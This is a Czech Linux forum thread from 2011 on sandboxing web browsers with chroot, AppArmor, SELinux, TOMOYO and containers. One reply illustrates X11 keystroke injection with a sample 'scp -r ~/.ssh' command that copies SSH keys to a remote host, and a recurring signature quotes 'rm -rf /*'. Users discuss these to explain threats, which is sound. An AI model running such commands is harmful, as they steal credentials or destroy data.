abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 04:33 | Bezpečnostní upozornění

    Byla vydána verze 0.81 telnet a ssh klienta PuTTY. Opravena je kritická bezpečnostní chyba CVE-2024-31497 obsažena ve verzích 0.68 až 0.80. Používáte-li klíč ECDSA NIST P521 a použili jste jej v PuTTY nebo Pageantu, považujte jej za kompromitovaný.

    Ladislav Hagara | Komentářů: 0
    včera 21:44 | Komunita

    Hra MineClone2 postavena nad voxelovým herním enginem Minetest byla přejmenována na VoxeLibre.

    Ladislav Hagara | Komentářů: 0
    včera 19:11 | IT novinky

    Společnosti Avast Software s.r.o. byla pravomocně uložena pokuta ve výši 351 milionů Kč. Tu uložil Úřad pro ochranu osobních údajů za neoprávněné zpracování osobních údajů uživatelů jejího antivirového programu Avast a jeho rozšíření internetových prohlížečů (Browser Extensions), k čemuž docházelo prokazatelně po část roku 2019.

    … více »
    Ladislav Hagara | Komentářů: 2
    včera 15:55 | Zajímavý článek

    Bylo vydáno do češtiny přeložené číslo 714 týdeníku WeeklyOSM přinášející zprávy ze světa OpenStreetMap.

    Ladislav Hagara | Komentářů: 0
    včera 15:44 | Pozvánky

    V sobotu 20. dubna lze navštívit Maker Faire Jihlava, festival plný workshopů, interaktivních činností a především nadšených a zvídavých lidí.

    Ladislav Hagara | Komentářů: 0
    včera 14:44 | Zajímavý software

    Knihovna pro potlačení šumu RNNoise byla vydána ve verzi 0.2. Kvalitu potlačení lze vyzkoušet na webovém demu.

    Ladislav Hagara | Komentářů: 0
    včera 04:33 | Nová verze

    FRRouting (FRR) (Wikipedie), tj. softwarová sada pro směrování síťové komunikace, fork Quagga, byl vydán ve verzi 10.0.

    Ladislav Hagara | Komentářů: 0
    včera 03:22 | Nová verze

    Julian Andres Klode vydal APT (Advanced Packaging Tool) ve verzích 2.9.0 a 2.9.1. Jedná se o vývojové verze nové větve APT 3.0. Vylepšuje se uživatelské rozhraní. Přidány byly barvičky. Aktuální náhledy a vývoj lze sledovat na Mastodonu.

    Ladislav Hagara | Komentářů: 3
    14.4. 17:00 | Komunita

    Miguel de Icaza se na svém blogu rozepsal o vložitelných herních enginech. Kdysi slibné projekty UrhoSharp a Urho3D jsou již mrtvé. Zůstává Godot. Aktuálně vývojáři řeší Pull request #90510 s návrhem knihovny LibGodot.

    Ladislav Hagara | Komentářů: 0
    14.4. 03:44 | Nová verze

    Byla vydána nová verze 5.0 linuxové distribuce Lakka, jež umožňuje transformovat podporované počítače v herní konzole. Nejnovější Lakka přichází s RetroArchem 1.17.0.

    Ladislav Hagara | Komentářů: 0
    KDE Plasma 6
     (60%)
     (13%)
     (2%)
     (24%)
    Celkem 409 hlasů
     Komentářů: 4, poslední 6.4. 15:51
    Rozcestník
    Štítky: není přiřazen žádný štítek


    Vložit další komentář
    Josef Kufner avatar 12.7.2011 01:45 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Co jsem si tak všimnul (benchmarky jsem nedělal), tak IE ve Virtualboxu na WinXP je zhruba stejně rychlý i paměťově náročný jako nativní Firefox verze 2.

    Nejlepší variantou by byl chroot vestavěný v prohlížeči. Nenáročné pro uživatele a přitom celkem bezpečné.
    Hello world ! Segmentation fault (core dumped)
    12.7.2011 09:14 Radovan Garabík
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nejlepší variantou by byl chroot vestavěný v prohlížeči
    - to by ale musel byť spúšťaný ako root (aspoň v normálnom svete)...
    pavlix avatar 12.7.2011 16:00 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nejlepší variantou by byl chroot vestavěný v prohlížeči. Nenáročné pro uživatele a přitom celkem bezpečné.
    To by bylo hodně smutné, kdyby nejlepší variantou byla taková věc jako chroot.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    cezz avatar 12.7.2011 17:05 cezz | skóre: 24 | blog: dm6
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To by bylo hodně smutné, kdyby nejlepší variantou byla taková věc jako chroot.
    +1
    Computers are not intelligent. They only think they are.
    Luk avatar 12.7.2011 02:04 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Firefox je tak pitomý že pokud nemá přístup do adresáře nastaveného jako cíl pro stahování tak nezobrazí chybovou hlášku a neskočí automaticky do nadřazeného adresáře jako každá normální aplikace ale prostě a jednoduše nic neudělá. Super, co?
    Zavraždit vývojáře málo ;-)

    Ad AppArmor - v openSUSE jsou již vytvořeny profily pro Firefox a Operu, nicméně jsou v extras, čili ve výchozím stavu se nepoužívají. Takže kdo to chce vyzkoušet, stačí přesunout potřebné profily přímo do /etc/apparmor.d a zapnout AppArmor jako takový.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    12.7.2011 02:16 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    A bug tim hnije i s patchem skoro čtyři roky.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Ruža Becelin avatar 12.7.2011 08:30 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    6) Stahnout si stranky na jinem PC webspiderem a prohlizet off-line.

    7) Vytrhnout kabel ze zdi a nepouzivat internet.

    :-D
    12.7.2011 09:41 kyytaM | skóre: 35 | blog: kyytaM | Bratislava
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    8) Najst si frajerku/frajera/domace zvieratko a nechodit po pochybnych strankach. :D
    Dalibor Smolík avatar 12.7.2011 10:01 Dalibor Smolík | skóre: 54 | blog: Postrehy_ze_zivota | 50°5'31.93"N,14°19'35.51"E
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Doporučuji zvířátko. To nekecá do výběru navštěvovaných stránek. :-)
    Rozdíly v řeči a ve zvyklostech neznamenají vůbec nic, budeme-li mít stejné cíle a otevřená srdce.
    12.7.2011 10:04 marek_hb
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    ale neuvaří ...
    vain avatar 12.7.2011 11:20 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To ani "dnešní frajerky" ;-)
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    AsciiWolf avatar 12.7.2011 12:44 AsciiWolf | skóre: 40 | blog: Blog
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    :-D
    Dalibor Smolík avatar 13.7.2011 17:06 Dalibor Smolík | skóre: 54 | blog: Postrehy_ze_zivota | 50°5'31.93"N,14°19'35.51"E
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    No právě :-)
    Rozdíly v řeči a ve zvyklostech neznamenají vůbec nic, budeme-li mít stejné cíle a otevřená srdce.
    12.7.2011 11:21 pasmen | skóre: 45 | blog: glob | Praha
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Ale může být uvařeno :-)
    12.7.2011 12:45 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To frajerka/frajer taky :)
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Jendа avatar 13.7.2011 00:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    houska avatar 12.7.2011 11:48 houska | skóre: 41 | blog: HW
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    a neoš*ká
    12.7.2011 12:01 pasmen | skóre: 45 | blog: glob | Praha
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    I tohle je sporné... :-)
    12.7.2011 12:47 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nesouhlasím.
    houska avatar 12.7.2011 14:40 houska | skóre: 41 | blog: HW
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    a jaky mas doma zvire?
    12.7.2011 18:01 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...

    Nejsi nějaký zvědavý? :-)

    No dobře, mám psa. ;-)

    kotyz avatar 12.7.2011 19:38 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Se psem by to slo ;-)
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    13.7.2011 09:32 polymorf | skóre: 14 | blog: tar_zxpf
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Pozor na svalovca
    kotyz avatar 13.7.2011 10:13 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To bys ho musel sežrat, jinak to nechytneš.
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    13.7.2011 18:52 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...

    +1

    Tohle se mne opravdu netýká. Jsem vegetarián. ;-)

    13.7.2011 21:04 w4rr10r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Orál?
    13.7.2011 22:42 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    ?
    kotyz avatar 13.7.2011 23:41 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Kloaka! :-D
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    12.7.2011 15:54 Bubak
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Mohl by autor rozvest proc nejde pouzit napriklad Chromium? Z hlediska bezpecnosti je o svetelne roky napred (napriklad kazdy Tab ma vlastni sandbox).

    12.7.2011 17:16 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Rozšíření Tamper Data :)
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    AsciiWolf avatar 12.7.2011 17:20 AsciiWolf | skóre: 40 | blog: Blog
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    pavlix avatar 12.7.2011 15:58 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    mezi (3) a (4) chybí možnost kontejnerů, vzhledem k tomu, že u (4) tvrdíš, že virtualizace má obrovskou režii, tak určitě kontejnery nezahrnuješ.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    12.7.2011 17:19 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jo, ale pro kontejnery (řekněme OpenVZ) jsou nevýhody +- stejné jako u chrootu.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    pavlix avatar 12.7.2011 17:58 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jo, ale pro kontejnery (řekněme OpenVZ) jsou nevýhody +- stejné jako u chrootu.
    Kéž by :D.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    12.7.2011 16:34 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Hádám, že při použití chrootu/jiného usera apod. narazím na první problém ve chvíli, kdy tim browserem budu chtít něco vyuploadovat z disku, co? :)
    12.7.2011 17:11 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jo, jediná možnost je to šibovat třeba přes /tmp :)
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Josef Kufner avatar 12.7.2011 17:45 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Raději ~/tmp a nechat tam bydlet samouklízecí script ;-)
    Hello world ! Segmentation fault (core dumped)
    12.7.2011 17:37 marvn
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    a noscript by nestacil?
    Josef Kufner avatar 12.7.2011 17:44 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nestačil. Bugy jsou i ve zpracování obrázků a dalších věcech. Navíc většina webů je bez javascriptu docela na nic :-(
    Hello world ! Segmentation fault (core dumped)
    12.7.2011 17:46 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Ne. Chyby nejsou jen v JS: 1, 2...
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    14.7.2011 10:56 marvn
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    jo no, pravda
    pavlix avatar 12.7.2011 17:59 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    A vytažení síťového kabelu? :)
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    elenril avatar 12.7.2011 17:57 elenril | skóre: 21 | blog: Raziel
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    5e) TOMOYO

    Je v jádře, vyvíjí se a jednoduše se nastavuje. Akorát o ní moc lidí neví, takže návodů člověk na internetech moc nenajde.
    Jendа avatar 13.7.2011 00:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Ano, už nad ním delší dobu medituju, ale pořád jsem neměl sílu to nastavit. Nějaká stránka s bezpečnostními politikami pro inspiraci? ;)
    elenril avatar 13.7.2011 12:27 elenril | skóre: 21 | blog: Raziel
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    O ničem nevim.

    Já ji mám v enforcing mode jen pro firefox. Tam jsem nejdřív na pár hodin zapnul learning mode (kde se každá operace automaticky povolí a přidá do whitelistu) a pak profiltroval výsledek.
    gtz avatar 12.7.2011 18:15 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    copak by na ty ďoury řekl náš expert na Mozillu Péťa?
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    12.7.2011 18:46 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To je otázka, jestli je i dostatečný expert i na ďoury...
    12.7.2011 18:47 kkaarreell | skóre: 6 | blog: perkele
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Se SElinuxem muzes pustit firefox v sandboxu, na tom nic sloziteho neni. Viz treba http://www.partlycloudy.org/2010/11/14/selinux-sandboxed-firefox.html
    12.7.2011 18:51 Woknař
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Doporučuji Lexaurin. Ta paranoia po něm trochu povolí.
    12.7.2011 18:57 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Doporučuju kouknout na kolika blacklistech je tvoje IP. To pak to sebevědomí trochu povolí.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    12.7.2011 21:46 smartin
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    ber to tak, ze u zavrenych prohlizecu vyjma Chrome (ktery je jen nadstavbou Chromium) o tehlech chybach nemas ani tuseni. IE by o tomhle mohlo psat sahodlouhe bakalarky.
    12.7.2011 23:10 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To není pravda, MS o bezpečnostních aktualizacích informuje, Opera taky. Ale řešit kdo je na tom hůř když jsou na tom tragicky všichni...
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    12.7.2011 22:20 ET
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    IMHO: sice se nevyhnes kompromitaci systemu, ale nic co by reboot nespravil - LIVE distro rulez - [nejlip vyprdnout z kernelu driver k radici disku, kdyz je clovek hodne paranoidni - coz asi zabije i cdromku, ale bootovat pres sit se taky da ]

    good luck

    PS: UTFG "ubuntu toram"
    12.7.2011 23:11 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To je ale DOST nepraktický.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    12.7.2011 23:20 ET
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    njn, jako vzdy je to boj "komfort vs bezpecnost" - ja jen pro doplneni

    btw: na i-banking bych nesel do niceho jinyho, ale je to holt individualni
    Jendа avatar 13.7.2011 00:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Pozor, i když jsi omezil přístup k souborům, pořád je to neosekaná X aplikace a může tedy keyloggerovat nebo posílat příkazy/klávesy ostatním aplikacím - třeba pošle 'scp -r ~/.ssh dastych@uooz.mvcr.cz:pripady/kinderporno/' xtermu.
    13.7.2011 00:52 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Pravda. Ale jaké řešení? Pouštět to v jiné instanci Xek?
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Jendа avatar 13.7.2011 01:17 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Hrál jsem si s „nested“ X serverem (Xephyr, Xnest a spol), ale vyladit to k dokonalosti se mi to nepovedlo (nic moc GTK téma, nefunkční schránka, pomalá odezva kurzoru myši).
    13.7.2011 20:25 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To by šlo vyřešit tím že zakážeš fork() nebo zakážeš/omezíš execve() (a spol.) ne? Nevim jak se to dělá, ale podle nějakýho článku na linux.com by to se SELinux jít mělo (i když tam nebylo napsaný jak).

    Každopádně zabránit prohlížeči aby logoval klávesy a někam je posílal asi nejde.
    Jendа avatar 13.7.2011 20:30 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Forkování by mělo být tak nějak defaultně nastavené na dědění omezení (jako že když prohlížeč, co nemůže do .ssh, forkne cat, tak ten taky nebude moct do .ssh). Ale k hrátkám v X nový proces nepotřebuješ.
    13.7.2011 20:36 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Co jsou "hrátky v X" a co jaký jsou hrozby?
    13.7.2011 21:18 penej
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    bump pro výbornou bouřku v Praze (vážně mě to zajímá)
    Jendа avatar 13.7.2011 21:20 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Zkus si třeba
    xdotool key d a t e Return
    A takhle může třeba zkompromitovaný prohlížeč poslat terminálu libovolný příkaz.
    14.7.2011 00:00 marbu | skóre: 31 | blog: hromada | Brno
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jak uz tu bylo nejednou receno, pokud ma program pristup ke tvym xkam (treba protoze na nich chce zobrazovat sve okno), muze sledovat udalosti stisknuti klaves nebo je generovat a to oboje pro libovolny program spusteny ve stejnych xkach. Hezky priklad treba zde: The Linux Security Circus: On GUI isolation.
    There is no point in being so cool in a cold world.
    1.8.2011 16:00 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    nasel jsem http://www.nsa.gov/research/_files/selinux/papers/x11/t1.shtml

    zatim jsem nemel cast to precist, ale vypada to ze presne resi tenhle problem
    1.8.2011 16:02 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    taky http://selinuxproject.org/page/NB_XWIN
    13.7.2011 10:38 penej
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nevěřím NSA. Stačí? Ne? Od tohohle průšvihu nevěřím moc ani SELinuxu. A na takovouhle jednoduchou úlohu je to moc komplikované.

    Jinak:

    V SELinuxu (tj. v mainline kernelu) je nejspíš trojan protože NSA odposlouchává telefony.

    Nebuď dumbfuck. Proč věříš grsecurity?

    A zapomněl jsi na TOMOYO.

    13.7.2011 11:41 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    V SELinuxu (tj. v mainline kernelu) je nejspíš trojan protože NSA odposlouchává telefony.
    Co? Nechápu souvislost mezi odposlechem telefonů a hypotetickým trojanem v SELinuxu.
    Proč věříš grsecurity?
    Protože pokud vím v grsec se ještě neobjevila zranitelnost typu local root :)
    A zapomněl jsi na TOMOYO.
    To jo.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 17:00 a.syntsow
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Objavila ...sice len 2* ale objavila. Neviem naco to tu riesis Mrkva. Viem ze chodis na spenderov kanal, preboha pytaj sa tam tych ludi. Je tam napriklad aj security vyvojar Ubuntu. Pytaj sa ich. Nie drbnutych ceskych stredoskolakov a pseudocelebritiek.
    13.7.2011 17:21 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Objavila ...sice len 2* ale objavila.
    Pravda, málo jsem hledal. Pardon.
    Neviem naco to tu riesis Mrkva
    Zajímá mě jak kdo řeší bezpečnost z místního osazenstva.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 17:25 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Viem ze chodis na spenderov kanal
    A tohle mi od paranoie nepomohlo.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 17:41 a.syntsow
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To ta len slachti ze nie si ako oni. Tuto to proste neries oni to nepochopia. Ja som tam tiez my dvaja sme sa dokonca bavili len je asi moja paranoia vacsia ako tvoja :) Napis mi niekde jabber skontaktujem ta a ked tak mozme pokecat.
    13.7.2011 18:00 l5-1
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    spenderov kanal?
    13.7.2011 18:50 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    #grsecurity na OFTC.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 19:31 l5-1
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    proc se tomu rika spenderov kanal?
    13.7.2011 16:13 CEST
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Zalezi na tom, jak dlouho je takova chyba neopravena. Ze melo neco 18 chyb za pul roku neznamena, ze byly uspesne napadeny vsechny pocitace. Normalne to totiz funguje tak, ze nekdo najde chybu. Kdyz to je black-hat, tak je problem, ale web viry se spis mnozi po utocich script kiddies, black hat delaji neco lepsiho. Pokud je to white head, tak upozorni autory a ti maji cas na opravu. Pokud na to nekde kasle (slysel jsem Microsoft?), tak je potom sranda. Po nejake dobe je pak chyba zverejnena, ale pokud autor reagoval, tak je jiz opravena a uzivatele by meli byt v pohode - z toho plyne aktualizovat - ja vim, v tech Vistach/7 je to otrava (aktualizovat, aktualizovat pri vypinani, aktualizovat pri zapinani) a navic jeste kazdej program hlidat zvlast (nebo proste zvlast odklikat X aktualizatoru).

    Pokud uz nekdo hackne Linux, tak vetsinou proto, ze si nejakej uzivatel ulozi root heslo na ftp do totalcommandera, nebo si nastavi root heslo "abc123". Ja bych to nehrotil.

    BTW: Doufam, ze ty ssh klice a gpg klice mas chraneni silnou frazi a pouzivas agenty, jinak si zaslouzis, aby ti to uzivatel www-data zobrazil na http serveru:)

    Na stanici bych to tak neresil, jednou jsem pouzival Skype v chrootu a stacilo mi to. Pokud zpracovavas citlivy udaje, tak backup a bez site, na nejaky tvoje pecko neni moc nikdo zvedavej. Neco jinyho je server, ale opravdu moc zalezi na tom, co mas za data a pak taky zalezi na tom, jestli mas vysoky ztraty. Jestli se nic moc nedeje, ze se dostanou na verejnost, tak by mela stacit zaloha pro ztrate dat a poskozeni. No a pokud je to blby kdyz se pouze dostanou ven, tak radsi odpojit od inetu a provadet akce offline (podobne jako CA).
    Jendа avatar 13.7.2011 17:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    BTW: Doufam, ze ty ssh klice a gpg klice mas chraneni silnou frazi a pouzivas agenty, jinak si zaslouzis, aby ti to uzivatel www-data zobrazil na http serveru:)
    Naštěstí nemají ostatní právo pro čtení.
    13.7.2011 20:32 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Naneštěstí má Chuck Norris roota
    pavlix avatar 14.7.2011 02:15 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Naštěstí nemá root Chucka Norrise.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    13.7.2011 20:35 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Hlavně tohleto je lepší, když to vůbec neni na disku nebo jinym zařízení s FS...
    18.7.2011 09:49 Jan Grmela | skóre: 45 | blog: Kilo šťávy z lachtana | Brno
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nejlepší řešení je separátní počítač. Při dnešní cenách to vyjde nastejno jako se drbat s dokonalým nastavením softwarových omezení. A navíc bezpečnostně je to bezkonkurenční :)

    P.S.: Osobně tyhle věci už dávno neřeším. Že by se mi někdo proboxoval z browseru do PC považuju za dost nepravděpodobné pokud člověk denně nestahuje kinderporno a tuny warezeu. Jediné, čeho se bojím, je Fleš -- na ten mám ale ve všech prohlížečích click-to-flash tudíž i zde je riziko minimální. A ani ne tak kvůli bezpečnosti jako spíše příšerné žravosti Fleše a tomu, že reklamy v něm realizované jsou obvykle extra otravné.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.